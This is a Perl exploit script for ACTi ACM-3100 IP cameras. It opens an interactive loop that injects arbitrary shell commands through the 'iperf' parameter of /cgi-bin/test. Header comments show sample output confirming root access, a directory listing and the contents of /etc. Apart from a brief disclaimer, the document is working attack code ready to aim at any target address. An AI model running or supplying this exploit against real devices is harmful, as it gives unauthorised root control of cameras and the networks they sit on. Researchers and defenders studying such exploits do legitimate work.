#!/usr/bin/perl
#
#  ACTi ACM-3100 Camera Remote Command Execution Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#       #  [test@localhost acti]$ perl actiroot.pl 192.168.1.1
#  #  [ ACTi ACM-3100 Camera Remote Command Execution Exploit
#  #  [ =========================================================
#  #  [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  # id
#  #  execute : /sbin/iperf -c ;id &
#  #  uid=0(root) gid=0(root)
#  #  # ls -la
#  #  execute : /sbin/iperf -c ;ls -la &
#  #  -rwxr-xr-x    1 0        0           14900 test
#  #  -rwxr-xr-x    1 0        0           32028 80503736
#  #  -rwxr-xr-x    1 0        0            8872 macdev
#  #  -rwxr-xr-x    1 0        0           29804 updatem
#  #  -rwxr-xr-x    1 0        0           31788 update
#  #  -rwxr-xr-x    1 0        0           28676 mpeg4
#  #  -rwxr-xr-x    1 0        0          137040 videoconfiguration.cgi
#  #  lrwxrwxrwx    1 0        0               6 url.cgi -> system
#  #  -rwxr-xr-x    1 0        0           27780 system
#  #  drwxr-xr-x    2 0        0            1024 cmd
#  #  drwxr-xr-x    5 0        0            1024 ..
#  #  drw-r--r--    3 0        0            1024 .
#  #  # ls -la /etc/
#  #  execute : /sbin/iperf -c ;ls -la /etc/ &
#  #  -rw-r--r--    1 0        0              71 hosts
#  #  drwxr-xr-x    3 0        0            1024 default
#  #  drwxr-xr-x    2 0        0            1024 config
#  #  -rwxr-xr-x    1 0        0            5834 protocols
#  #  drwxr-xr-x    4 0        0            1024 ppp
#  #  drwxr-xr-x    2 0        0            1024 dhcpc
#  #  -rwxr-xr-x    1 0        0             211 inittab
#  #  -rwxr-xr-x    1 0        0              26 host.conf
#  #  -rwxr-xr-x    1 0        0             534 passwd
#  #  -rwxr-xr-x    1 0        0             280 group
#  #  drwxr-xr-x    2 0        0            1024 init.d
#  #  -rwxr-xr-x    1 0        0             421 profile
#  #  -rw-r--r--    1 0        0              25 resolv.conf
#  #  -rwxr-xr-x    1 0        0           10787 services
#  #  drwxr-xr-x    2 0        0            1024 thttpd
#  #  -rwxr-xr-x    1 0        0             251 fstab
#  #  drwxr-xr-x   13 0        0            1024 ..
#  #  drwxr-xr-x    8 0        0            1024 .
#  #  # 
#  #  

use LWP::Simple;

print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit
[ =========================================================
[ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if(not defined $ARGV[0])
{
     print "[ Usage: perl $0 [target]\n";
     print "[ Example: perl $0 192.168.1.1\n\n";
     exit;
}
my $host  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
while(1)
{
     print "\# ";
     chomp($cmd = <STDIN>);
     if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     last if $cmd eq 'exit';
     last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}"));
     print $resp;
}